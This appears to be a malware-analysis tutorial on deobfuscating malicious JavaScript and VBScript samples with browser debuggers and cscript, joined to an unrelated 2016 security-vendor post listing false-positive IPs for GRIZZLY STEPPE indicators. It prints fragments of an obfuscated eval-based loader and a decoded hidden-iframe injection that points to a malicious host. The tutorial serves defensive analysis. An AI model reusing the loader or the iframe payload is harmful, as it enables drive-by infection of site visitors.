
<Mozilla>

1. Edit the sample.html file to add the debugger; statement at the beginning of the script.

2. Load script.html into Firefox using the browser's File menu.

3. Use Firebug to set a breakpoint on the eval(txt); line of the script.

4. Look at the contents of the variable "txt" by typing the console.log(txt) command in Firebug's Console tab.

5. Examine the deobfuscated script in the Console tab.

 

 

1. Edit the sample.html file to add the debugger; statement at the beginning of the script.

2. Load script.html into Firefox using the browser's File menu.

 

--sample.html-

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="#KEYWORDS#" />
<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" />
<title>...Berlin with the appointed export lotus notes address book of...</title>
<script>

debugger;
var arr =

"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";

  • var table = new Array();table['0'] = 0;table['1'] = 1;table['2'] = 2;table['3'] = 3;table['4'] = 4;table['5'] = 5;table['6'] = 6;table['7'] = 7;table['8'] = 8;table['9'] = 9;table['a'] = 10;table['b'] = 11;table['c'] = 12;table['d'] = 13;table['e'] = 14;table['f'] = 15;function markCounter(a) { 

    var txt = ""; var c = 0; 

    while (c < a.length) {txt += String.fromCharCode(table[a[c]] * 16 + table[a[c + 1]]); c += 2;} 

    eval(txt);

3. Use Firebug to set a breakpoint on the eval(txt); line of the script.

 

 

4. Look at the contents of the variable "txt" by typing the console.log(txt) command in Firebug's Console tab.

5. Examine the deobfuscated script in the Console tab.

 

 

A***freehost.com

URL, which is probably malicious.

 

---------------------------------------------------------------------------------------------------------------------------------------------------------

<IE>

 

  1. Edit sample.html in Notepad++ to insert the "debugger;" statement at the beginning of its script.
  2. Open sample.html in Internet Explorer and activate the debugger in Developer Tools.
  3. Reload the script in Internet Explorer to activate the debugger.
  4. Set a breakpoint using the Internet Explorer debugger on the third instance of document.write.
  5. Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.
  6. Copy contents of the variable G82B54 to the clipboard and paste them into Notepad++
  7. Examine the deobfuscated script in Notepad++ and then exit Internet Explorer and the text editor.

 

 

 

1. Edit sample.html in Notepad++ to insert the "debugger;" statement at the beginning of its script.

 

 

 

 

2. Open sample.html in Internet Explorer and activate the debugger in Developer Tools.

 

3. Reload the script in Internet Explorer to activate the debugger.

 

 

4. Set a breakpoint using the Internet Explorer debugger on the third instance of document.write.

 

5. Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.

6. Copy the contents of the variable G82B54 to the clipboard and paste them into Notepad++.

 

 

 

 

7. Examine the deobfuscated script in Notepad++, and then exit Internet Explorer and the text editor.

The URL is a malicious site.

G82B54 "</textarea><iframe src=\http://66.109.***.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp\ width=1 height=1 style=\"border: 0px\"></iframe>"

 

--------------------------------------------------------------------------------------------------------------------------------------------VBScript

Using the Cscript Interpreter

 

1. Right-click vbscript.vbs and select Edit with Notepad++. Add the following code at the beginning of the file,
2. redefining the execute function so that, instead of executing its argument, it echoes it:

 

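' Stub that shadows the sample's execute(): instead of running the decoded
' payload it echoes it, so cscript prints the deobfuscated script to stdout
' (redirect stdout to a file to capture it). The host object is WScript;
' the original "SCript.Echo" is not a valid WSH object and would fail.
Function execute(x)
    WScript.Echo x
End Function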

 

 

 

 

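REM Run the patched sample under cscript and capture the echoed (deobfuscated)
REM script in out.txt. Note the original line "cscript > vbscript.vbs > out.txt"
REM redirects cscript's usage text INTO vbscript.vbs, overwriting the sample
REM instead of running it; the script path must be an argument, not a redirect.
cscript //nologo vbscript.vbs > out.txt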

Read out.txt to see the echoed (deobfuscated) script.

 

 

The 1390***.cn URL is a malicious site.

Michael Sconzo

Threat: GRIZZLY STEPPE

Posted by Michael Sconzo Employee Dec 30, 2016

The FirstWatch team is constantly tracking various threats and threat actors. As part of that diligence, they monitor third parties for various bulletins and reports. US-CERT recently issued a report detailing an intrusion into a political organization believed to have originated from a nation-state attacker. This attacker, named 'GRIZZLY STEPPE', is the subject of a Joint Analysis Report (JAR) by DHS and DNI. The report can be found here: https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity

 

Additionally, US-CERT has published an intrusion set that contains network indicators of compromise (IOCs) for the attack. RSA has added these indicators to the NetWitness Live platform (via Feeds); they can be located in NetWitness with the following custom pivot:

threat.source = "third party publicized iocs" && threat.category = "us-cert"

 

That said, some of the indicators as published are problematic, as they contain legitimate IPs that we believe will produce benign hits. We've identified the following IPs (at a minimum) as potential false-positive indicators:

Twitter:
199.59.148.23
Yahoo:
98.138.199.240
66.196.116.112
98.138.79.73
72.30.196.161
Akamai:
104.93.2.201
Google:
216.58.216.174
216.58.216.142
Microsoft:
134.170.108.26
65.55.252.43

 

.Edu OWA Server:
134.121.241.31

 

TOR EXIT NODES:
5.149.254.114
185.100.86.122
203.218.5.241
207.176.226.8
74.208.191.202
185.13.76.45
5.28.62.85
5.135.158.101
5.196.1.129
5.249.145.164
35.0.127.52
37.220.35.202
45.33.48.204
46.28.68.158
46.165.223.217
46.165.230.5
46.182.106.190
51.255.33.0
51.255.202.66
62.210.129.246
64.113.32.29
69.162.139.9
79.172.193.32
80.240.139.111
85.143.219.211
88.198.14.171
89.31.57.5
89.163.237.45
89.187.142.208
89.187.144.122
91.121.230.209
91.146.121.3
91.213.8.84
91.213.8.236
91.219.236.218
91.228.151.52
92.222.6.12
92.222.103.234
93.174.90.30
93.184.66.227
94.102.49.175
94.142.242.84
95.130.11.147
106.187.37.101
107.181.174.84
107.182.131.117
108.166.168.158
109.74.151.149
109.163.234.5
109.163.234.8
128.52.128.105
128.153.145.125
146.185.177.103
148.251.255.92
149.56.223.241
149.56.229.17
158.130.0.242
162.247.72.27
162.247.72.199
162.247.72.200
162.247.72.201
162.247.72.202
162.247.72.216
162.247.72.217
162.247.73.204
162.247.73.206
163.172.135.172
163.172.136.101
163.172.209.46
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
171.25.193.132
171.25.193.235
173.254.216.66
176.10.104.243
176.10.107.180
176.31.7.241
176.58.100.98
178.17.170.124
178.17.170.164
178.17.174.10
178.17.174.99
178.32.53.94
178.175.131.194
178.217.187.39
178.239.167.15
185.11.180.67
185.17.184.228
185.34.33.2
185.36.100.145
185.38.14.171
185.38.14.215
185.69.168.112
185.129.62.62
185.129.62.63
188.126.81.155
193.90.12.86
193.90.12.87
193.90.12.88
193.90.12.89
193.90.12.90
193.111.136.162
195.154.8.111
195.154.90.122
198.50.200.135
198.58.107.53
198.96.155.3
199.87.154.251
199.87.154.255
199.127.226.150
204.11.50.131
204.85.191.30
209.133.66.214
209.249.180.198
212.117.180.130
216.239.90.19
217.12.204.104
217.13.197.5
217.115.10.131
217.115.10.132
109.163.234.2
141.138.141.208
178.17.170.201
185.128.40.220
198.50.200.131
204.194.29.4
207.244.97.183
209.222.77.220
23.239.10.144
64.137.178.3
71.19.157.127
89.187.145.103
94.242.57.2

Hits on any GRIZZLY STEPPE indicator warrant additional investigation, but hits on the IP addresses above should be investigated with the expectation that they are false positives. None of these indicators have been removed from the feed, since we don't want to alter third-party information and remove potentially useful context.
